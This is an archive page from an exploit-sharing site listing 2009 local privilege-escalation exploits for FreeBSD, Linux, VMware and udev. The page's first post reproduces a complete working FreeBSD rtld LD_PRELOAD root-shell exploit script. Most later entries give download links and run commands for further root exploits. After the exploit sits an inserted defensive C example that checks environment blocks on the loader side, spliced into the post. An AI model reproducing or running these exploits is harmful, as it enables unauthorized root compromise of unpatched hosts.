Archive

Archive for the 'Linux Exploit' category

FreeBSD Run-Time Link-Editor Local r00t Zeroday

December 1, 2009 (1 comment)

Discovered & Exploited by Nikolaos Rangos also known as Kingcope.
Nov 2009 “BiG TiME”

“Go fetch your FreeBSD r00tkitz” // http://www.youtube.com/watch?v=dDnhthI27Fg

There is an unbelievably simple local r00t bug in recent FreeBSD versions.
I audited FreeBSD for local r00t bugs a long time *sigh*. Now it pays off.

The bug resides in the Run-Time Link-Editor (rtld).
Normally rtld does not allow dangerous environment variables like LD_PRELOAD
to be set when executing setugid binaries like “ping” or “su”.
With a rather simple technique rtld can be tricked into
accepting LD variables even on setugid binaries.
See the attached exploit for details.

#!/bin/sh
echo ** FreeBSD local r00t zeroday
echo by Kingcope
echo November 2009
cat > env.c << _EOF
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

/* Hand-build an environment block: entry 0 is an empty string rather than a
 * NAME=value pair, entry 1 carries LD_PRELOAD, then a setuid binary is
 * executed.  The malformed first entry is what makes rtld's removal of the
 * LD_ variables fail without rtld noticing. */
int main(void) {
       extern char **environ;
       environ = (char**)malloc(8096);

       environ[0] = (char*)malloc(1024);
       environ[1] = (char*)malloc(1024);
       environ[0][0] = '\0';
       strcpy(environ[1], "LD_PRELOAD=/tmp/w00t.so.1.0");
       environ[2] = NULL;

       execl("/sbin/ping", "ping", (char*)0);
       return 0;
}
_EOF
gcc env.c -o env
cat > program.c << _EOF
#include <unistd.h>
#include <stdio.h>
#include <sys/types.h>
#include <stdlib.h>

/* Runs when the preloaded object is mapped into the setuid process; the
 * environment is cleared so the child shell is not preloaded again. */
void _init() {
       extern char **environ;
       environ=NULL;
       system("echo ALEX-ALEX;/bin/sh");
}
_EOF
gcc -o program.o -c program.c -fPIC
gcc -shared -Wl,-soname,w00t.so.1 -o w00t.so.1.0 program.o -nostartfiles
cp w00t.so.1.0 /tmp/w00t.so.1.0
./env
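A loader-side environment check, added here as an example; it is not code from the advisory and not FreeBSD's rtld. It treats a block containing an entry that is not NAME=value (the empty entry env.c plants) as fatal instead of continuing, and strips every LD_ variable with its own loop rather than trusting unsetenv() to succeed. The blocks in main() are constructed to mirror the one env.c builds.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* 1 if every entry is NAME=value with a non-empty name, 0 otherwise.
 * An empty entry such as the one env.c leaves in environ[0] fails. */
int env_block_well_formed(char *const *env) {
    for (size_t i = 0; env[i] != NULL; i++) {
        const char *eq = strchr(env[i], '=');
        if (env[i][0] == '\0' || eq == NULL || eq == env[i])
            return 0;
    }
    return 1;
}

/* Drop every LD_* entry, compacting the array in place, without going
 * through unsetenv().  Returns the number of entries removed. */
size_t scrub_ld_vars(char **env) {
    size_t w = 0, removed = 0;
    for (size_t r = 0; env[r] != NULL; r++) {
        if (strncmp(env[r], "LD_", 3) == 0) { removed++; continue; }
        env[w++] = env[r];
    }
    env[w] = NULL;
    return removed;
}

/* Policy for a setugid process: a malformed block is fatal (-1) rather
 * than something to keep executing with; otherwise scrub and return 0. */
int setugid_env_check(char **env) {
    if (!env_block_well_formed(env))
        return -1;
    scrub_ld_vars(env);
    return 0;
}

int main(void) {
    /* Constructed block mirroring env.c: empty entry, then LD_PRELOAD. */
    char e0[] = "", e1[] = "LD_PRELOAD=/tmp/w00t.so.1.0", e2[] = "PATH=/bin";
    char *bad[] = { e0, e1, e2, NULL };
    printf("malformed block: %s\n", setugid_env_check(bad) ? "abort" : "ok");
    /* Same variables in a well-formed block: LD_PRELOAD is stripped. */
    char *good[] = { e2, e1, NULL };
    printf("well-formed block: %zu LD_ entries removed, first entry now %s\n",
           scrub_ld_vars(good), good[0]);
    return 0;
}
```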
Categories: Linux Exploit, Vulnerability Collection Tags:

VMWare Virtual 8086 Linux Local Ring0 Exploit

November 25, 2009 (1 comment)

###############################
# EDB-ID: 10207
# CVE-ID: (CVE-2009-2267)
# Title: VMWare Virtual 8086 Linux Local Ring0 Exploit
# Author: Tavis Ormandy and Julien Tinnes
# Published: 2009-10-27
# Download Exploit Code
# Download N/A
###############################
Published: Oct 27 2009 12:00AM
Updated: Oct 27 2009 09:18PM
Credit: Tavis Ormandy and Julien Tinnes of the Google Security Team
Vulnerable: VMWare Workstation 6.5.3
VMWare Workstation 6.5.2 build 156735
VMWare Workstation 6.5.2
VMWare Workstation 6.5.1
VMWare Workstation 6.5 build 118166
VMWare Server 2.0.1 build 156745
VMWare Server 2.0.1
VMWare Server 1.0.9 build 156507
VMWare Server 1.0.9
VMWare Server 1.0.8 build 126538
VMWare Server 1.0.8
VMWare Server 1.0.7 build 108231
VMWare Server 1.0.7
VMWare Server 1.0.6 build 91891
VMWare Server 1.0.6
VMWare Server 1.0.5 Build 80187
VMWare Server 1.0.5
VMWare Server 1.0.4
VMWare Server 1.0.3
VMWare Server 1.0.2
VMWare Server 2.0
VMWare Player 2.5.3
VMWare Player 2.5.2 build 156735
VMWare Player 2.5.2
VMWare Player 2.5.1
VMWare Player 2.5 build 118166
VMWare Fusion 2.0.6
VMWare Fusion 2.0.5
VMWare Fusion 2.0.4
VMWare Fusion 2.0.3
VMWare Fusion 2.0.2 build 147997
VMWare Fusion 2
VMWare ESXi Server 4.0
VMWare ESXi Server 3.5 ESXe350-20090440
VMWare ESXi Server 3.5
VMWare ESX Server 3.0.3 ESX303-200905401-SG
VMWare ESX Server 3.0.3 ESX303-200812406-BG
VMWare ESX Server 3.0.3
VMWare ESX Server 3.0.2 ESX-1008420
VMWare ESX Server 3.0.2
VMWare ESX Server 3.0.1
VMWare ESX Server 3.0
VMWare ESX Server 2.5.5 patch 9
VMWare ESX Server 2.5.5 patch 8
VMWare ESX Server 2.5.5 patch 6
VMWare ESX Server 2.5.5 patch 4
VMWare ESX Server 2.5.5 patch 2
VMWare ESX Server 2.5.5 patch 13
VMWare ESX Server 2.5.5 patch 12
VMWare ESX Server 2.5.5 patch 11
VMWare ESX Server 2.5.5 patch 10
VMWare ESX Server 2.5.5
VMWare ESX Server 2.5.4 patch 21
VMWare ESX Server 2.5.4 patch 19
VMWare ESX Server 2.5.4 Patch 17
VMWare ESX Server 2.5.4 Patch 16
VMWare ESX Server 2.5.4 patch 15
VMWare ESX Server 2.5.4 patch 13
VMWare ESX Server 2.5.4 Patch 1
VMWare ESX Server 2.5.4
VMWare ESX Server 2.5.3 Patch 4
VMWare ESX Server 2.5.3
VMWare ESX Server 2.5.2
VMWare ESX Server 2.5
VMWare ESX Server 2.1.3 Patch 2
VMWare ESX Server 2.1.3
VMWare ESX Server 2.1.2
VMWare ESX Server 2.1.1
VMWare ESX Server 2.1
VMWare ESX Server 2.0.2 Patch 2
VMWare ESX Server 2.0.2
VMWare ESX Server 2.0.1 build 6403
VMWare ESX Server 2.0.1
VMWare ESX Server 2.0 build 5257
VMWare ESX Server 2.0
VMWare ESX Server 4.0
VMWare ESX Server 3.5 ESX350-200906407
VMWare ESX Server 3.5 ESX350-200904401
VMWare ESX Server 3.5
VMWare ESX Server 2.5.5 patch 5
VMWare ESX Server 2.5.3 Patch 2
VMWare ESX Server 2.5.2 Patch 4
VMWare ESX Server 2.1.3 Patch 1
VMWare ESX Server 2.0.2 Patch 1
VMWare ACE 2.5.2 build 156735
VMWare ACE 2.5.2
VMWare ACE 2.5.1
VMWare ACE 2.5 build 118166
Not Vulnerable: VMWare Workstation 6.5.3 build 185404
VMWare Server 2.0.2 Build 203138
VMWare Server 1.0.10 Build 203137
VMWare Player 2.5.3 build 185404
VMWare Fusion 2.0.6 Build 196839
VMWare ESXi Server 4.0 ESXi400-20090940
VMWare ESXi Server 3.5 ESXe350-20091040
VMWare ESX Server 3.0.3 ESX303-200910401-BG
VMWare ESX Server 2.5.5 patch 15
VMWare ESX Server 4.0 ESX400-200909401
VMWare ESX Server 3.5 ESX350-200910401
VMWare ACE 2.5.3 Build 185404

Download: http://www.007hack.com/tool/linux/vmware86.tar.gz

Category: Linux Exploit Tags:

Linux Kernel 2.4/2.6 sock_sendpage() Local Root Exploit

November 24, 2009 (no comments)

This third version features: complete support for i386, x86_64, ppc and ppc64; the personality trick published by Tavis Ormandy and Julien Tinnes; the TOC pointer workaround for data item addressing on ppc64 (i.e. functions in the exploit code and in libc can be referenced); and improved search for, and transition to, SELinux types with the mmap_zero permission.

Tested on RedHat Linux 9.0, Fedora Core 4 to 11, Whitebox 4 and CentOS 4.x.

Test result:

root1

Download: http://www.007hack.com/tool/linux/2009-linux-sendpage3.tar.gz

Category: Linux Exploit Tags:

FreeBSD <=6.1 kqueue() NULL pointer Dereference Local Root Exploit

September 27, 2009 (no comments)

Tested successfully on:

FreeBSD 6.1

Use:

freebsd

Download: http://www.007hack.com/tool/linux/freebsd-6.1.c

Category: Linux Exploit Tags:

Linux Local Privilege Escalation Exploit

September 27, 2009 (2 comments)

Tested successfully on:

RedHat Enterprise Linux 4/5
CentOS 4/5
Ubuntu 9.04

Use:

./wunderbar_emporium-3

Download: http://www.007hack.com/tool/linux/wunderbar_emporium-3.gz

Category: Linux Exploit Tags:

udev Local Privilege Escalation Exploit

September 27, 2009 (no comments)

Confirmed affected versions:

RHEL 5.x
Debian 4.x, 5.x
Fedora 10
CentOS 5.2
Fedora 7/8

Use:

ps -aux|grep udev

sh udev.sh Pid-1

Download: http://www.007hack.com/tool/linux/udev.sh

Category: Linux Exploit Tags: